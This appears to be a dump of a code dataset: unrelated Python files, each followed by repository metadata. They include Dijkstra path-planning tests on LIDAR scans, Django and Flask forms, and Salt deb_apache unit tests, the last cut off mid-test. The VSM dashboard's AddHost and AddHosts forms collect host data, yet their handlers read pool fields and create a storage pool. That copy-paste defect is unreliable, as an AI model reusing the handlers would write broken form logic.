1.2014520168304443, 1.2100038528442383, 1.1812770366668701, 1.1618354320526123, 1.1519147157669067, 1.1456130743026733, 1.1571439504623413, 1.1326026916503906, 1.1386666297912598, 1.0997953414916992, 1.091562271118164, 1.1005403995513916, 1.1073905229568481, 1.075814962387085, 1.0699113607406616, 1.078955054283142, 1.0810444355010986, 1.0660544633865356, 1.0604965686798096, 1.0380046367645264, 1.0327768325805664, 1.078073501586914, 1.0491496324539185, 1.0314854383468628, 1.0256805419921875, 1.0399309396743774, 1.039351224899292, 1.0458898544311523, 1.0328317880630493, 1.0365073680877686, 1.0345937013626099, 1.0336904525756836, 1.045121431350708, 1.019679069519043, 0.9782207012176514, 0.9893175959587097, 0.9512673616409302, 0.9016335606575012, 0.8861187696456909, 0.8714970350265503, 0.8524404168128967, 0.8410521745681763, 0.8306225538253784, 0.806861162185669, 0.7750387787818909, 0.772260308265686, 0.7613915205001831, 0.7231266498565674, 0.7228431701660156, 0.7109572291374207, 0.7123162746429443, 0.6959463357925415, 0.6842755079269409, 0.6778551936149597, 0.672926127910614, 0.6455686688423157, 0.6492228507995605, 0.650477945804596, 0.6205228567123413, 0.63560950756073, 0.6331012845039368, 0.6159425973892212, 0.6135613918304443, 0.5959789752960205, 0.610405445098877, 0.5870363712310791, 0.5804761052131653, 0.6007770299911499, 0.5676383972167969, 0.5660935640335083, 0.5781680345535278, 0.5915207862854004, 0.5583205819129944, 0.5651285648345947, 0.5652458071708679, 0.5596476197242737, 0.545867919921875, 0.5507373809814453, 0.5318761467933655, 0.542111337184906, 0.540361225605011, 0.5328619480133057, 0.5332945585250854, 0.5352373123168945, 0.5453101992607117, 0.5408035516738892, 0.5488573908805847, 0.5210607647895813, 0.5293474793434143, 0.5348880290985107, 0.5456039905548096, 0.5199136734008789, 0.5178253650665283, 0.5266040563583374, 0.5523934364318848, 0.5342961549758911, 0.5384075045585632, 0.5334569215774536, 0.5281636714935303, 0.5111650228500366, 
0.5428661704063416, 0.5401403903961182, 0.5570170879364014, 0.5265321731567383, 0.5520188212394714, 0.5388387441635132, 0.5361006855964661, 0.5432685613632202, 0.5588036775588989, 0.5637043118476868, 0.5593273043632507, 0.5618724226951599, 0.5681909918785095, 0.580647349357605, 0.5878729224205017, 0.567261815071106, 0.5693681240081787, 0.5898579955101013, 0.6078497171401978, 0.6051531434059143, 0.6091262102127075, 0.5822492837905884, 0.6195617318153381, 0.6141515374183655, 0.617192804813385, 0.6386907696723938, 0.6485453248023987, 0.6483967900276184, 0.6659299731254578, 0.6548660397529602, 0.6864899396896362, 0.6838104128837585, 0.6932967901229858, 0.7090590596199036, 0.7026281356811523, 0.7346917986869812, 0.7633113861083984, 0.7599661350250244, 0.7832435369491577, 0.779472291469574, 0.8087064623832703, 0.8164687752723694, 0.8538014888763428, 0.8430877923965454, 0.8757237195968628, 0.8956906199455261, 0.9206846356391907, 0.9354161024093628, 0.9733413457870483, 0.9885174036026001, 1.0486935377120972, 1.049687385559082, 1.1021144390106201, 1.1006282567977905, 1.1586135625839233, 1.2052730321884155, 1.2459439039230347, 1.302675485610962, 1.3653827905654907, 1.4164248704910278, 1.4472814798355103, 1.535380244255066, 1.532191514968872, 1.5412589311599731, 1.5219082832336426, 1.5472310781478882, 1.5644363164901733, 1.55789053440094, 1.5711780786514282, 1.5786079168319702, 1.5898356437683105, 1.600523829460144, 1.6128002405166626, 1.6159331798553467, 1.626638412475586, 1.8782384395599365, 2.235314130783081, 2.2563958168029785, 2.2954134941101074, 2.307398557662964, 2.3106799125671387, 2.351066827774048, 2.391575813293457, 2.3959853649139404, 2.430370569229126, 2.449401378631592, 2.478189468383789, 2.516754150390625, 2.5472171306610107, 2.59478759765625, 2.6314077377319336, 2.6275601387023926, 2.682375907897949, 2.7329845428466797, 2.7940165996551514, 2.8262627124786377, 2.891613245010376, 2.943937301635742, 2.9711005687713623, 3.0209319591522217, 3.1053292751312256, 
1.0324296951293945, 1.0091277360916138, 1.0003530979156494, 0.9934810996055603, 0.9784740209579468, 0.9725538492202759, 0.9597940444946289, 0.9535285830497742, 0.9423716068267822, 0.9491086602210999, 0.966484010219574, 0.9733442068099976, 0.9970974326133728, 1.0060924291610718, 1.0158592462539673, 1.0913983583450317, inf, inf, inf, inf, 2.0314512252807617, 2.0178802013397217, 1.9728460311889648, 1.961500883102417, 1.9714338779449463, 1.9641704559326172, 2.0064427852630615, 2.0385403633117676, 3.066349506378174, 3.039686918258667, 3.0638043880462646, 3.07513165473938, inf, inf, inf, inf, inf, inf, inf, inf, inf]
o = Mapper()
prob_map = Mapper.main(o,scan)
d =Dijkstra()
d(prob_map , [36,36], [50,30])
print('\n ' + '-'*30 + "\n> Starting operation ...\n " + '-'*30 + '\n')
start_time = time.time()
final_path = d.find_path()
print('\n ' + '-'*30 + "\n> Time taken: {:.4} seconds.\n ".format(time.time() - start_time) + '-'*30 + '\n')
d.draw_final_graph(final_path)
def test2():
inf = np.inf
scan=[inf, inf, inf, inf, inf, inf, 2.122950792312622, 1.8218177556991577, 1.59413743019104, 1.423231601715088, 1.323502540588379, 1.3081393241882324, 1.3145588636398315, 1.3490028381347656, 1.335472822189331, 1.319705605506897, 1.3400593996047974, 1.3491653203964233, 1.3466880321502686, 1.3696467876434326, 1.3745601177215576, 1.3833107948303223, 1.3923722505569458, 1.4062138795852661, 1.3897963762283325, 1.4243078231811523, 1.4298373460769653, 1.4416676759719849, 1.450016736984253, 1.471937656402588, 1.5024218559265137, 1.4850928783416748, 1.5270593166351318, 1.5272008180618286, 1.5350757837295532, 1.5613079071044922, 1.58877432346344, 1.6090070009231567, 1.6587506532669067, 1.6668319702148438, 1.6823045015335083, 1.711564540863037, 1.7509064674377441, 1.7584381103515625, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.650038242340088, 2.6445717811584473, 2.631784677505493, 2.6164636611938477, 2.6125850677490234, 2.5924696922302246, 2.5889229774475098, 2.5727877616882324, 2.5825552940368652, 2.5913491249084473, 2.5679054260253906, 2.575549840927124, 2.5961365699768066, 2.578033447265625, 2.563906669616699, 2.576000690460205, 2.586289644241333, 2.5772287845611572, 2.5811655521392822, 2.5825459957122803, 2.588222026824951, 2.5943994522094727, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.9890737533569336, 2.9071550369262695, 2.8188626766204834, 2.7494678497314453, 2.67634916305542, 2.6266491413116455, 2.5653467178344727, 2.5333642959594727, 2.4661786556243896, 2.4012131690979004, 2.3687829971313477, 2.323002338409424, 2.2887566089630127, 2.2677664756774902, 2.296781539916992, 2.3500185012817383, 2.360821008682251, 2.453289031982422, 2.4872214794158936, 2.548398017883301, 2.6022679805755615, 2.6568949222564697, 2.7322375774383545, 2.7981326580047607, 2.8849222660064697, 
2.9328646659851074, 3.0372416973114014, inf, inf, inf, inf, inf, 3.4685451984405518, 3.4392693042755127, 3.423564910888672, 3.389524221420288, 3.3799402713775635, 3.355445146560669, 3.335869073867798, 3.295499086380005, 3.285273551940918, 3.2675883769989014, 3.2415120601654053, 3.2439682483673096, 3.21799898147583, 3.207578659057617, 3.2076492309570312, 3.3214356899261475, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 1.7193019390106201, 1.679825782775879, 1.650679349899292, 1.6179615259170532, 1.5983997583389282, 1.5532128810882568, 1.5364797115325928, 1.5386948585510254, 1.5013322830200195, 1.4845850467681885, 1.4534012079238892, 1.444892168045044, 1.4262295961380005, 1.4062203168869019, 1.4057549238204956, 1.3824982643127441, 1.367220163345337, 1.3536320924758911, 1.3183528184890747, 1.3393183946609497, 1.312820553779602, 1.3034974336624146, 1.2918084859848022, 1.2986373901367188, 1.2754086256027222, 1.271276831626892, 1.2715413570404053, 1.2496140003204346, 1.220840334892273, 1.259627103805542, 1.2267930507659912, 1.2130810022354126, 1.2276153564453125, 1.2212096452713013, 1.281704306602478, 1.3779208660125732, 1.5410783290863037, 1.7324031591415405, 1.9674873352050781, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.966913938522339, 2.879478931427002, 2.812376022338867, 2.7323076725006104, 2.667478322982788, 2.613341808319092, 2.5557971000671387, 2.4918932914733887, 2.439162492752075, 2.3888156414031982, 2.3447256088256836, 2.304054021835327, 2.2600510120391846, 2.2221076488494873, 2.216076374053955, 2.2552261352539062, 2.31876802444458, 2.357189178466797, 2.396010398864746, 2.4466495513916016, 
2.4985275268554688, 2.564828395843506, 2.634127140045166, 2.671659231185913, 2.7563955783843994, 2.829598903656006, 2.9014203548431396, 2.9869801998138428, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf]
o = Mapper()
prob_map = Mapper.main(o,scan)
d =Dijkstra()
d(prob_map , [36,36], [50,30])
print('\n ' + '-'*30 + "\n> Starting operation ...\n " + '-'*30 + '\n')
start_time = time.time()
final_path = d.find_path()
print('\n ' + '-'*30 + "\n> Time taken: {:.4} seconds.\n ".format(time.time() - start_time) + '-'*30 + '\n')
d.draw_final_graph(final_path)
| 221.036364 | 6,584 | 0.795015 | 1,401 | 12,157 | 6.878658 | 0.396146 | 0.133859 | 0.189582 | 0.237833 | 0.125039 | 0.12369 | 0.121926 | 0.121511 | 0.121511 | 0.121511 | 0 | 0.743362 | 0.082997 | 12,157 | 54 | 6,585 | 225.12963 | 0.121098 | 0.001727 | 0 | 0.571429 | 0 | 0 | 0.016153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.2 | 0 | 0.257143 | 0.114286 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
077fe718b1b70cc36ba02ab23bc4cab0434e2f20 | 60 | py | Python | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | import package_example.ex10
package_example.ex10.convert()
| 15 | 30 | 0.85 | 8 | 60 | 6.125 | 0.625 | 0.571429 | 0.734694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.066667 | 60 | 3 | 31 | 20 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
079c11017a95799a4f3f1683c2402eb3e7d5f14b | 39 | py | Python | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | from .shear import Catalog,ShearCatalog | 39 | 39 | 0.871795 | 5 | 39 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 39 | 1 | 39 | 39 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07a6783444323705f3964f08b5d19d01e296920a | 18 | py | Python | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 1,886 | 2021-05-03T23:58:43.000Z | 2022-03-31T19:15:58.000Z | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 70 | 2021-05-04T23:25:35.000Z | 2022-03-31T18:42:08.000Z | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 52 | 2021-05-04T21:26:03.000Z | 2022-03-08T18:02:56.000Z | a = 1 + \
2 + \
4
| 4.5 | 9 | 0.222222 | 4 | 18 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 18 | 3 | 10 | 6 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07d0f790a3a8095ca916e0b6aed5212d51f70f7f | 6,754 | py | Python | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 172 | 2015-01-07T08:40:17.000Z | 2019-02-18T07:01:11.000Z | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 83 | 2015-03-06T07:47:03.000Z | 2018-07-05T15:10:19.000Z | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 125 | 2015-01-05T12:22:15.000Z | 2019-02-18T07:01:39.000Z |
# Copyright 2014 Intel Corporation, All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the"License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from django.core import validators
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils.validators import validate_port_range
from horizon.utils import fields
import logging
from vsm_dashboard.api import vsm as vsm_api
LOG = logging.getLogger(__name__)
class AddHost(forms.SelfHandlingForm):
failure_url = 'horizon:vsm:storageservermgmt:index'
host_name = forms.CharField(label=_("Host name"),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput(),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
server_type = forms.ChoiceField(label=_('Server Type'))
zone = forms.ChoiceField(label=_('Zone'))
def __init__(self, request, *args, **kwargs):
super(AddHost, self).__init__(request, *args, **kwargs)
self.fields['server_type'].choices = [('storage', 'storage'),
('monitor', 'monitor'),
('mixed', 'storage, monitor')]
self.fields['zone'].choices = [('zone_a', 'zone_a'),
('zone_b', 'zone_b')]
def handle(self, request, data):
try:
body = {
'pool': {
'name': data['name'],
'storageGroupId': data['storage_group'],
'replicationFactor': data['replication_factor'],
'clusterId': '0',
'createdBy': 'VSM'
}
}
rsp, ret = vsm_api.create_storage_pool(request,body=body)
res = str(ret['message']).strip( )
if res.startswith('pool') and res.endswith('created'):
messages.success(request,
_('Successfully created storage pool: %s')
% data['name'])
else:
messages.error(request,
_('Because %s, failed to create storage pool')
% ret['message'])
return ret
except:
redirect = reverse("horizon:vsm:poolsmanagement:index")
exceptions.handle(request,
_('Unable to create storage pool.'),
redirect=redirect)
class AddHosts(forms.SelfHandlingForm):
failure_url = 'horizon:vsm:storageservermgmt:index'
host_name = forms.CharField(label=_("Host name"),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput(),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
server_type = forms.ChoiceField(label=_('Server Type'))
zone = forms.ChoiceField(label=_('Zone'))
def __init__(self, request, *args, **kwargs):
super(AddHosts, self).__init__(request, *args, **kwargs)
self.fields['server_type'].choices = [('storage', 'storage'),
('monitor', 'monitor'),
('mixed', 'storage, monitor')]
self.fields['zone'].choices = [('zone_a', 'zone_a'),
('zone_b', 'zone_b')]
def handle(self, request, data):
try:
body = {
'pool': {
'name': data['name'],
'storageGroupId': data['storage_group'],
'replicationFactor': data['replication_factor'],
'clusterId': '0',
'createdBy': 'VSM'
}
}
rsp, ret = vsm_api.create_storage_pool(request,body=body)
res = str(ret['message']).strip( )
if res.startswith('pool') and res.endswith('created'):
messages.success(request,
_('Successfully created storage pool: %s')
% data['name'])
else:
messages.error(request,
_('Because %s, failed to create storage pool')
% ret['message'])
return ret
except:
redirect = reverse("horizon:vsm:poolsmanagement:index")
exceptions.handle(request,
_('Unable to create storage pool.'),
redirect=redirect)
| 41.691358 | 78 | 0.490672 | 584 | 6,754 | 5.520548 | 0.291096 | 0.027295 | 0.031638 | 0.01861 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0 | 0.006494 | 0.407166 | 6,754 | 161 | 79 | 41.950311 | 0.798701 | 0.084691 | 0 | 0.842975 | 0 | 0 | 0.198119 | 0.022049 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033058 | false | 0.033058 | 0.082645 | 0 | 0.231405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed10d986ec3c4ebbb14ab767b75a140932e36102 | 536 | py | Python | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | null | null | null | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | 22 | 2020-04-01T08:16:06.000Z | 2020-09-24T21:33:56.000Z | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import PasswordField
from wtforms.validators import DataRequired, InputRequired, EqualTo
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('old_password', validators=[DataRequired(), InputRequired()])
new_password = PasswordField('new_password', validators=[DataRequired(), InputRequired(),
EqualTo('confirm', message='Passwords must match')])
confirm = PasswordField('confirm', validators=[DataRequired(), InputRequired()]) | 59.555556 | 94 | 0.735075 | 47 | 536 | 8.276596 | 0.446809 | 0.257069 | 0.269923 | 0.22108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158582 | 536 | 9 | 95 | 59.555556 | 0.862528 | 0 | 0 | 0 | 0 | 0 | 0.108007 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.75 | 0.375 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
ed3219e6ca62c15df24225139d7b567630908a94 | 152 | py | Python | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | null | null | null | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 11 | 2020-07-31T02:26:29.000Z | 2022-02-08T18:59:59.000Z | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 1 | 2020-11-24T17:02:54.000Z | 2020-11-24T17:02:54.000Z | from .base_dataset import BaseDataset
from .zoo import *
from .dataset import dataset, get_dataset, get_dataset_cls
from .utils import get_mean_and_std
| 30.4 | 58 | 0.835526 | 24 | 152 | 5 | 0.5 | 0.216667 | 0.283333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118421 | 152 | 4 | 59 | 38 | 0.895522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ed5e1f19f04f6a2723d5c0c6af47c73c83ff25dd | 13,876 | py | Python | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | 1 | 2022-02-09T06:40:14.000Z | 2022-02-09T06:40:14.000Z | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | null | null | null | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | 4 | 2020-11-04T06:28:05.000Z | 2022-02-09T10:54:49.000Z | # -*- coding: utf-8 -*-
'''
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
'''
# Import Python libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt Libs
import salt.modules.deb_apache as deb_apache
@skipIf(NO_MOCK, NO_MOCK_REASON)
class DebApacheTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.modules.deb_apache
'''
def setup_loader_modules(self):
return {deb_apache: {}}
# 'check_site_enabled' function tests: 3
def test_check_site_enabled(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_site_enabled('saltstack.com'))
def test_check_site_enabled_default(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(side_effect=[False, True])):
self.assertTrue(deb_apache.check_site_enabled('default'))
def test_check_site_enabled_false(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_site_enabled('saltstack.com'))
# 'a2ensite' function tests: 4
def test_a2ensite_notfound(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com Not found'})
def test_a2ensite_enabled(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com enabled'})
def test_a2ensite(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 2})
def test_a2ensite_exception(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2ensite('saltstack.com')),
'error')
# 'a2dissite' function tests: 4
def test_a2dissite_notfound(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com Not found'})
def test_a2dissite_disabled(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com disabled'})
def test_a2dissite(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 2})
def test_a2dissite_exception(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2dissite('saltstack.com')),
'error')
# 'check_mod_enabled' function tests: 2
def test_check_mod_enabled(self):
'''
Test if the specific mod symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_mod_enabled('status.conf'))
def test_check_mod_enabled_false(self):
'''
Test if the specific mod symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_mod_enabled('status.conf'))
# 'a2enmod' function tests: 4
def test_a2enmod_notfound(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias Not found'})
def test_a2enmod_enabled(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias enabled'})
def test_a2enmod(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 2})
def test_a2enmod_exception(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2enmod('vhost_alias')),
'error')
# 'a2dismod' function tests: 4
def test_a2dismod_notfound(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
